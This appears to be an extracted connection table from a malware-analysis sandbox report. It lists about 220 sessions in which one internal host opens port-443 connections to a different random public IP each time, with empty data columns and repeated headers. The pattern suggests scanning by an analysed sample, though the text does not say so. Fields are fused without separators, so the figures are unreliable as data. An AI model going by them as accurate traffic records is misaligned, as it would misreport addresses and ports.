                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10806192.168.2.234462868.99.76.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10807192.168.2.233321667.58.45.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10808192.168.2.2335758118.164.214.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10809192.168.2.2339500150.188.34.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10810192.168.2.2333808206.77.237.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10811192.168.2.233546848.144.129.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10812192.168.2.235951423.128.65.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10813192.168.2.2342468209.58.78.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10814192.168.2.2358790131.181.216.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10815192.168.2.234048625.36.252.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10816192.168.2.2360902106.141.201.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10817192.168.2.2337820110.216.102.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10818192.168.2.234616254.248.197.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10819192.168.2.235718813.35.36.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10820192.168.2.2345130154.74.163.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10821192.168.2.235483474.64.70.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10822192.168.2.235512666.0.53.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10823192.168.2.233364018.191.58.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10824192.168.2.2345466201.123.50.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10825192.168.2.234335675.81.79.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10826192.168.2.2340326128.242.209.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10827192.168.2.234670423.18.228.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10828192.168.2.2335640198.251.127.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10829192.168.2.235655089.182.245.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10830192.168.2.2334698212.14.238.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10831192.168.2.233956813.247.6.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10832192.168.2.2347584211.81.53.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10833192.168.2.235861852.193.55.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10834192.168.2.2343616148.51.88.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10835192.168.2.2359238200.23.4.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10836192.168.2.2352560165.17.14.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10837192.168.2.2353500155.101.114.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10838192.168.2.2340604105.244.100.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10839192.168.2.2349682203.11.52.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10840192.168.2.233878677.248.208.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10841192.168.2.2341096190.78.174.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10842192.168.2.235069091.7.44.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10843192.168.2.2335838118.62.165.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10844192.168.2.2359098117.6.14.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10845192.168.2.2345062118.161.108.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10846192.168.2.234372827.78.240.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10847192.168.2.233776831.161.151.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10848192.168.2.2347964188.243.196.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10849192.168.2.235379068.160.239.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10850192.168.2.233642872.152.86.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10851192.168.2.2357856201.205.169.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10852192.168.2.2342446150.65.38.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10853192.168.2.2346644209.200.135.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10854192.168.2.234792449.167.194.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10855192.168.2.234768012.167.79.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10856192.168.2.2332874143.231.186.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10857192.168.2.235041484.175.147.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10858192.168.2.233900236.141.72.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10859192.168.2.2357846202.1.242.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10860192.168.2.2359650192.22.4.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10861192.168.2.2334158191.213.46.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10862192.168.2.234611098.113.33.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10863192.168.2.236085220.38.95.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10864192.168.2.234573013.235.179.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10865192.168.2.2357998198.232.72.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10866192.168.2.234905279.232.208.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10867192.168.2.234557278.243.149.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10868192.168.2.2359540149.52.220.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10869192.168.2.23350908.143.76.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10870192.168.2.233665086.35.30.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10871192.168.2.235490851.222.177.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10872192.168.2.2336088101.183.153.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10873192.168.2.235210443.210.12.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10874192.168.2.2351666137.135.55.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10875192.168.2.23433284.138.87.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10876192.168.2.2352194211.224.226.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10877192.168.2.235940227.159.182.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10878192.168.2.234203660.87.9.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10879192.168.2.2353608200.224.135.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10880192.168.2.23442421.214.22.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10881192.168.2.235692660.132.43.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10882192.168.2.2343170126.82.135.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10883192.168.2.236096471.158.93.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10884192.168.2.235559632.197.232.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10885192.168.2.2357492217.30.89.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10886192.168.2.235260652.68.27.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10887192.168.2.2344072207.233.33.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10888192.168.2.2335206147.24.5.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10889192.168.2.2334964170.76.222.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10890192.168.2.235116678.187.226.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10891192.168.2.2359636197.161.249.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10892192.168.2.2343654113.59.120.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10893192.168.2.2353628129.243.99.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10894192.168.2.2350170149.7.51.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10895192.168.2.234872431.173.55.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10896192.168.2.2343898218.102.177.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10897192.168.2.23495405.77.221.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10898192.168.2.234364850.34.195.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10899192.168.2.2357540223.189.65.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10900192.168.2.234876678.175.26.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10901192.168.2.234886424.84.97.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10902192.168.2.235787614.47.245.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10903192.168.2.2350234147.169.6.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10904192.168.2.23545221.144.161.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10905192.168.2.2345226143.251.47.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10906192.168.2.234318420.18.41.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10907192.168.2.233333870.123.149.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10908192.168.2.2332926146.229.139.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10909192.168.2.235936851.117.117.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10910192.168.2.2342880122.85.147.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10911192.168.2.2355466207.188.165.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10912192.168.2.233818892.119.176.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10913192.168.2.2334626158.194.122.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10914192.168.2.2340004162.117.101.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10915192.168.2.2352960140.131.12.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10916192.168.2.234445012.124.84.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10917192.168.2.2343252137.158.254.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10918192.168.2.2348984195.180.99.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10919192.168.2.2356528123.194.87.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10920192.168.2.2343452191.48.11.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10921192.168.2.2351688182.152.11.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10922192.168.2.2343624142.241.33.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10923192.168.2.235961881.230.4.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10924192.168.2.2345574191.206.202.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10925192.168.2.234421679.178.139.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10926192.168.2.234465019.17.47.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10927192.168.2.235531894.6.166.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10928192.168.2.2358922113.174.9.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10929192.168.2.2334962181.100.106.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10930192.168.2.2334696184.255.223.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10931192.168.2.2335174105.142.130.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10932192.168.2.2358892128.215.158.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10933192.168.2.2338032209.65.82.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10934192.168.2.2355656205.5.165.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10935192.168.2.2346122175.193.27.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10936192.168.2.23517262.204.133.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10937192.168.2.2341484189.223.159.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10938192.168.2.234087876.191.4.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10939192.168.2.2337318125.214.167.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10940192.168.2.2356982198.36.92.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10941192.168.2.2357168106.35.185.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10942192.168.2.2336016181.6.162.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10943192.168.2.2352948155.105.81.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10944192.168.2.235386073.50.176.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10945192.168.2.2359690189.30.142.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10946192.168.2.2345520106.123.177.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10947192.168.2.2348164128.251.133.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10948192.168.2.2333106180.33.73.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10949192.168.2.23506308.211.109.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10950192.168.2.233907699.221.166.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10951192.168.2.2360698201.250.5.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10952192.168.2.233799880.41.144.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10953192.168.2.234806660.20.94.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10954192.168.2.2344740176.249.205.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10955192.168.2.23580528.128.29.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10956192.168.2.233489254.188.120.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10957192.168.2.2345006133.48.28.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10958192.168.2.2349300107.64.28.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10959192.168.2.235845462.195.52.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10960192.168.2.233700494.118.254.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10961192.168.2.2341974172.207.250.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10962192.168.2.234949834.236.175.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10963192.168.2.234665012.21.211.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10964192.168.2.2358280107.83.199.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10965192.168.2.233693642.43.132.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10966192.168.2.233948266.182.5.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10967192.168.2.234680099.203.140.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10968192.168.2.2336398143.246.23.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10969192.168.2.235742475.217.136.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10970192.168.2.2345948159.49.82.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10971192.168.2.2347374178.33.45.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10972192.168.2.2356988121.17.120.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10973192.168.2.233457442.70.43.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10974192.168.2.2353470183.166.33.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10975192.168.2.2354370146.165.140.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10976192.168.2.2335822110.52.78.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10977192.168.2.233460062.189.38.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10978192.168.2.2334428216.58.76.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10979192.168.2.233580849.72.224.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10980192.168.2.2354152107.84.170.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10981192.168.2.2346102180.81.141.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10982192.168.2.2338798102.142.169.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10983192.168.2.2347930164.244.50.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10984192.168.2.235884846.190.98.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10985192.168.2.233659293.45.139.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10986192.168.2.236063863.240.164.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10987192.168.2.234548054.133.140.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10988192.168.2.235647854.151.34.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10989192.168.2.2344406122.9.249.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10990192.168.2.2349836195.128.109.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10991192.168.2.2357702143.61.136.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10992192.168.2.235459868.88.248.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10993192.168.2.235822224.170.78.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10994192.168.2.235286239.241.106.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10995192.168.2.2341568185.131.110.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10996192.168.2.233833427.102.56.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10997192.168.2.235430287.153.56.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10998192.168.2.2354804129.36.224.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10999192.168.2.235176631.71.172.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11000192.168.2.2358266181.22.5.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11001192.168.2.2347416135.159.168.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11002192.168.2.2358912164.161.83.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11003192.168.2.2339672203.80.142.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11004192.168.2.2347382152.31.175.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11005192.168.2.23440742.185.56.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11006192.168.2.233660058.160.168.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11007192.168.2.235755089.207.154.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11008192.168.2.234602250.201.255.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11009192.168.2.234071450.158.113.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11010192.168.2.2354408183.122.60.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11011192.168.2.233402483.189.144.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11012192.168.2.235736058.244.231.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11013192.168.2.2339418223.10.181.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11014192.168.2.2335934195.191.111.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11015192.168.2.2353772152.49.157.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11016192.168.2.234669263.79.69.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11017192.168.2.235796069.19.231.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11018192.168.2.2339858140.205.75.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11019192.168.2.2341138131.199.103.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11020192.168.2.2346508139.141.183.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11021192.168.2.233421261.181.149.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11022192.168.2.234040025.33.74.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11023192.168.2.2339522171.9.140.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11024192.168.2.2335410183.191.168.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11025192.168.2.2345200167.244.96.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11026192.168.2.235956059.139.15.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11027192.168.2.2354440203.5.11.144443
